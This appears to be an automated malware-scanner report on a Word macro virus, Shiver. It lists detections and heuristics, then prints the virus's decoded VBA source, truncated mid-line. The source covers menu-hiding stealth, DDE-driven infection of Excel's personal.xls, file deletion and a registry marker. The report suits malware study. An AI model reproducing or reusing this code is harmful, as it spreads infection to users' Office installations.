Verdict: MALICIOUS
Risk Score: 320

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The file contains VBA macros, including Auto_Open and Auto_Close functions, which are commonly used to initiate malicious activity upon opening or closing a document. The critical heuristic firing for Shell() call in VBA indicates that the macro attempts to execute external commands. The script evidence shows an attempt to insert a file from 'c:\shiver.sys', suggesting it acts as a downloader or dropper for a second-stage payload. The ClamAV detection 'Doc.Trojan.Shiver-1' further supports its malicious nature.
Heuristics (6)
- ClamAV: Doc.Trojan.Shiver-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Shiver-1
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27847 bytes |

SHA-256: 7f0b7aa4e2ba0ef2ed3b4f1718d660daa6f596def623dc0e25767ef4adb92032
Detection (ClamAV): Doc.Trojan.Shiver-1
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal strClassName As String, ByVal lpWindowName As Any) As Long
Attribute FindWindow.VB_ProcData.VB_Invoke_Func = " \n14"
Public ExcelFound, WordFound, Marker, JustRun As Boolean
Sub WordStealth()
Attribute WordStealth.VB_ProcData.VB_Invoke_Func = " \n14"
Yin = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If Yin < 4 Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString "Sub ToolsMacro()" & vbCr & "End Sub" & vbCr & "Sub FileTemplates()" & vbCr & "End Sub" & vbCr & "Sub ViewVBCode()" & vbCr & "End Sub"
End If
End Sub
Sub AutoExit()
Attribute AutoExit.VB_ProcData.VB_Invoke_Func = " \n14"
Randomize
On Error GoTo out
Call CheckMarker
hWnd = FindApp("XLMain")
If hWnd <> 0 Then ExcelFound = True
If ExcelFound = False And Marker = False Then
Application.WindowState = wdWindowStateMinimize
Call PersonalFun
Shell (Application.Path + "\Excel.exe"), vbMinimizedFocus
Do While ExcelFound = False
Call FindExcel
Loop
Application.DDETerminateAll
CNL = Application.DDEInitiate("Excel", "system")
Application.DDEExecute CNL, "[New(4)]"
Application.DDETerminate CNL
CNL = Application.DDEInitiate("Excel", "Macro1")
Application.DDEPoke CNL, Item:="R1C1", Data:="=VBA.INSERT.FILE(""c:\shiver.sys"")"
Application.DDEPoke CNL, Item:="R2C1", Data:="=SAVE.AS(""" & Application.Path & "\xlstart\personal.xls"")"
Application.DDEPoke CNL, Item:="R3C1", Data:="=Return()"
DDEExecute channel:=CNL, Command:="[Run(""R1C1"")]"
Application.DDETerminate CNL
CNL = Application.DDEInitiate("Excel", "system")
Application.DDEExecute CNL, "[RUN(""Personal.xls!PXL_Done"")]"
Application.DDETerminate CNL
Call MakeMarker
JustRun = True
End If
out:
If (Int(Rnd * 30) = 5) Then Call wdReEvalInfection
End Sub
Sub FindExcel()
Attribute FindExcel.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
For x = 1 To 50
w = Tasks.Item(x)
If Mid(w, 1, 15) = "Microsoft Excel" Then
ExcelFound = True
Exit Sub
End If
Next x
End Sub
Function FindApp(ByVal varClassName As Variant) As Long
Attribute FindApp.VB_ProcData.VB_Invoke_Func = " \n14"
If IsNull(varClassName) Then
FindApp = 0
Else
FindApp = FindWindow(CStr(varClassName), 0&)
End If
End Function
Sub PersonalFun()
Attribute PersonalFun.VB_ProcData.VB_Invoke_Func = " \n14"
PSLIVE = Application.Path + "\xlstart\personal.xls"
PS = Dir(PSLIVE)
If "PERSONAL.XLS" = UCase(PS) Then
Kill PSLIVE
End If
End Sub
Sub CheckMarker()
Attribute CheckMarker.VB_ProcData.VB_Invoke_Func = " \n14"
If Application.Application = "Microsoft Word" Then
mkr = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "Shiver[DDE]")
Else
mkr = GetSetting("Office", "8.0", "Shiver[DDE]")
End If
If mkr = "ALT-F11" Then Marker = True
End Sub
Sub MakeMarker()
Attribute MakeMarker.VB_ProcData.VB_Invoke_Func = " \n14"
If Application.Application = "Microsoft Word" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "Shiver[DDE]") = "ALT-F11"
Else
SaveSetting "Office", "8.0", "Shiver[DDE]", "ALT-F11"
End If
End Sub
Sub PXL_Done()
Attribute PXL_Done.VB_ProcData.VB_Invoke_Func = " \n14"
ActiveWindow.Visible = False
Workbooks("personal.xls").Save
Application.Quit
End Sub
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "ShiverTime"
End Sub
Sub ShiverTime()
Attribute ShiverTime.VB_ProcData.VB_Invoke_Func = " \n14"
Rando
```

... (truncated)